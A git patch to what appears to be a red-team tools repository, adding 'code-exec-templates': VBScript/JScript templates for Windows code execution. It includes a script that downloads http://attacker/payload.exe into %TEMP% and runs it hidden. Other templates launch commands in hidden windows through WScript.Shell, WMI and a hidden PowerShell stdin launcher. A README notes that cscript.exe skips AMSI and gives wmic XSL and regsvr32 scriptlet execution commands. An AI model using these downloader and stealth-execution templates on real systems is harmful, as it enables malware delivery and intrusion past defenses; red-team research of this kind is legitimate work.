From 8e976e7ceefdeefbd6410b3fc7f56879b1453422 Mon Sep 17 00:00:00 2001 From: "Mariusz B. / mgeeky" Date: Wed, 6 May 2020 19:22:32 +0200 Subject: [PATCH] Added code-exec-templates --- red-teaming/README.md | 2 + red-teaming/code-exec-templates/README.md | 57 +++++++++++++++++++ .../download-file-and-exec.vbs | 38 +++++++++++++ .../hello-world-jscript-xslt.xsl | 15 +++++ .../code-exec-templates/wmi-exec-command.vbs | 20 +++++++ .../wscript-shell-code-exec.vbs | 13 +++++ .../wscript-shell-run-jscript-scriptlet.sct | 15 +++++ .../wscript-shell-run-jscript-xslt.xsl | 14 +++++ .../wscript-shell-run-vbscript.hta | 14 +++++ .../wscript-shell-stdin-code-exec.vbs | 19 +++++++ 10 files changed, 207 insertions(+) create mode 100644 red-teaming/code-exec-templates/README.md create mode 100644 red-teaming/code-exec-templates/download-file-and-exec.vbs create mode 100644 red-teaming/code-exec-templates/hello-world-jscript-xslt.xsl create mode 100644 red-teaming/code-exec-templates/wmi-exec-command.vbs create mode 100644 red-teaming/code-exec-templates/wscript-shell-code-exec.vbs create mode 100644 red-teaming/code-exec-templates/wscript-shell-run-jscript-scriptlet.sct create mode 100644 red-teaming/code-exec-templates/wscript-shell-run-jscript-xslt.xsl create mode 100644 red-teaming/code-exec-templates/wscript-shell-run-vbscript.hta create mode 100644 red-teaming/code-exec-templates/wscript-shell-stdin-code-exec.vbs diff --git a/red-teaming/README.md b/red-teaming/README.md index 5f49556..4ae0bc6 100644 --- a/red-teaming/README.md +++ b/red-teaming/README.md @@ -52,6 +52,8 @@ cmstp.exe /ni /s cmstp.inf - **`cobalt-arsenal`** - A set of my published Cobalt Strike 4.0+ compatible aggressor scripts. That includes couple of my handy utils I've used on various engagements. +- [**`code-exec-templates`**](https://github.com/mgeeky/Penetration-Testing-Tools/tree/master/red-teaming/code-exec-templates) - a small collection of template/backbone files for various code-execution techniques (VBScript/JScript embedded in HTA/SCT/XSL/VBS/JS) + - **`compressedPowershell.py`** - Creates a Powershell snippet containing GZIP-Compressed payload that will get decompressed and executed (IEX) . ([gist](https://gist.github.com/mgeeky/e30ceecc2082a11b99c7b24b42bd77fc)) diff --git a/red-teaming/code-exec-templates/README.md b/red-teaming/code-exec-templates/README.md new file mode 100644 index 0000000..f27fd27 --- /dev/null +++ b/red-teaming/code-exec-templates/README.md @@ -0,0 +1,57 @@ +### A small collection of unobfuscated code-execution primitives in different languages + +A handy collection of small primitives/templates useulf for code-execution, downloading or otherwise offensive purposes. Whenever a quick sample of VBScript/JScript/C# code is needed - this directory should bring you one. + +Windows Script Host (WSH) subsystem can execute VBScript/JScript scritplets using two pre-installed interpreters: + +- `cscript.exe` - to be used for command-line, dynamic script execution. **Doesn't load AMSI** + +- `wscript.exe` - For general scripts execution. **This one loads AMSI** + + +#### VBScript + +- **`download-file-and-exec.vbs`** - Downloads a binary file using `Msxml2.ServerXMLHTTP`, stores it to the disk `Adodb.Stream` and then launches it via `Wscript.Shell Run` + +- **`wmi-exec-command.vbs`** - Example of VBScript code execution via WMI class' `Win32_Process` static method `Create` + +- **`wscript-shell-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window. + +- **`wscript-shell-stdin-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window through a command passed from StdIn to `powershell` + + +#### JScript + + +#### XSL + +XSL files can be executed in the following ways: + +- Using `wmic.exe`: +``` +wmic os get /format:"jscript-xslt-template.xsl" +``` + +Templates: + +- **`hello-world-jscript-xslt.xsl`** - A sample backbone for XSLT file with JScript code showing a simple message box. + +- **`wscript-shell-run-jscript-xslt.xsl`** - JScript XSLT with `WScript.Shell.Run` method + + + +#### COM Scriptlets + +Sample code execution with `regsvr32` can be following: +``` +regsvr32 /u /n /s /i:wscript-shell-run-jscript-scriptlet.sct scrobj.dll +``` + +- **`wscript-shell-run-jscript-scriptlet.sct`** - SCT file with JSCript code execution via `WScript.Shell.Run` + + +#### HTA + +HTA files are HTML Applications + +- **`wscript-shell-run-vbscript.hta`** - A backbone for `WScript.Shell.Run` via _VBScript_ \ No newline at end of file diff --git a/red-teaming/code-exec-templates/download-file-and-exec.vbs b/red-teaming/code-exec-templates/download-file-and-exec.vbs new file mode 100644 index 0000000..e20366f --- /dev/null +++ b/red-teaming/code-exec-templates/download-file-and-exec.vbs @@ -0,0 +1,38 @@ +' +' Example of downloading a binary file from the URL, saving it to the +' local filesystem and then launching. +' +' Mariusz B. / mgeeky, +' (https://github.com/mgeeky) +' + +downloadURL = "http://attacker/payload.exe" +saveAs = "%TEMP%\foo.exe" +parameters = "" + +Dim sh: Set sh = CreateObject("WScript.Shell") +out = sh.ExpandEnvironmentStrings(saveAs) + +' STEP 1: Download File +Dim xhr: Set xhr = CreateObject("Msxml2.ServerXMLHTTP") +xhr.Open "GET", downloadURL, False +xhr.Send + +' STEP 2: Save binary file +If xhr.Status = 200 Then + With CreateObject("Adodb.Stream") + .Open + .Type = 1 + .write xhr.responseBody + .savetofile out, 2 + End With + + ' STEP 3: Execute file + cmd = out & " " & parameters + MsgBox cmd + sh.Run cmd, 0, False + +End If + +Set sh = Nothing +Set xhr = Nothing \ No newline at end of file diff --git a/red-teaming/code-exec-templates/hello-world-jscript-xslt.xsl b/red-teaming/code-exec-templates/hello-world-jscript-xslt.xsl new file mode 100644 index 0000000..a483e85 --- /dev/null +++ b/red-teaming/code-exec-templates/hello-world-jscript-xslt.xsl @@ -0,0 +1,15 @@ + + + + + + \ No newline at end of file diff --git a/red-teaming/code-exec-templates/wmi-exec-command.vbs b/red-teaming/code-exec-templates/wmi-exec-command.vbs new file mode 100644 index 0000000..e917727 --- /dev/null +++ b/red-teaming/code-exec-templates/wmi-exec-command.vbs @@ -0,0 +1,20 @@ +' +' This script uses WMI class' Win32_Process static method Create to +' execute given command in a hidden window (ShowWindow = 12). +' +' Mariusz B. / mgeeky, +' (https://github.com/mgeeky) +' + +command = "notepad.exe" +computer = "." + +Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _ + & computer & "\root\cimv2") + +Set startup = wmi.Get("Win32_ProcessStartup") +Set conf = startup.SpawnInstance_ +conf.ShowWindow = 12 + +Set proc = GetObject("winmgmts:root\cimv2:Win32_Process") +proc.Create command, Null, conf, intProcessID \ No newline at end of file diff --git a/red-teaming/code-exec-templates/wscript-shell-code-exec.vbs b/red-teaming/code-exec-templates/wscript-shell-code-exec.vbs new file mode 100644 index 0000000..f6c3d00 --- /dev/null +++ b/red-teaming/code-exec-templates/wscript-shell-code-exec.vbs @@ -0,0 +1,13 @@ +' +' This script uses classic WScript.Shell Run method to +' execute given command in a hidden window (second param = 0) +' +' Mariusz B. / mgeeky, +' (https://github.com/mgeeky) +' + +command = "notepad.exe" + +With CreateObject("WScript.Shell") + .Run command, 0, False +End With diff --git a/red-teaming/code-exec-templates/wscript-shell-run-jscript-scriptlet.sct b/red-teaming/code-exec-templates/wscript-shell-run-jscript-scriptlet.sct new file mode 100644 index 0000000..afcdbfe --- /dev/null +++ b/red-teaming/code-exec-templates/wscript-shell-run-jscript-scriptlet.sct @@ -0,0 +1,15 @@ + + + + + + \ No newline at end of file diff --git a/red-teaming/code-exec-templates/wscript-shell-run-jscript-xslt.xsl b/red-teaming/code-exec-templates/wscript-shell-run-jscript-xslt.xsl new file mode 100644 index 0000000..04c017c --- /dev/null +++ b/red-teaming/code-exec-templates/wscript-shell-run-jscript-xslt.xsl @@ -0,0 +1,14 @@ + + + + + + \ No newline at end of file diff --git a/red-teaming/code-exec-templates/wscript-shell-run-vbscript.hta b/red-teaming/code-exec-templates/wscript-shell-run-vbscript.hta new file mode 100644 index 0000000..e946d45 --- /dev/null +++ b/red-teaming/code-exec-templates/wscript-shell-run-vbscript.hta @@ -0,0 +1,14 @@ + + + + + + + \ No newline at end of file diff --git a/red-teaming/code-exec-templates/wscript-shell-stdin-code-exec.vbs b/red-teaming/code-exec-templates/wscript-shell-stdin-code-exec.vbs new file mode 100644 index 0000000..c1bb438 --- /dev/null +++ b/red-teaming/code-exec-templates/wscript-shell-stdin-code-exec.vbs @@ -0,0 +1,19 @@ +' +' This script uses classic WScript.Shell Exec method to +' execute given command in a hidden window via StdIn passed to a dedicated +' launcher command (powershell.exe in this example). +' +' Mariusz B. / mgeeky, +' (https://github.com/mgeeky) +' + +command = "notepad.exe" +launcher = "powershell -nop -w hid -Command -" + +With CreateObject("WScript.Shell") + With .Exec(launcher) + .StdIn.WriteLine command + .StdIn.WriteBlankLines 1 + .Terminate + End With +End With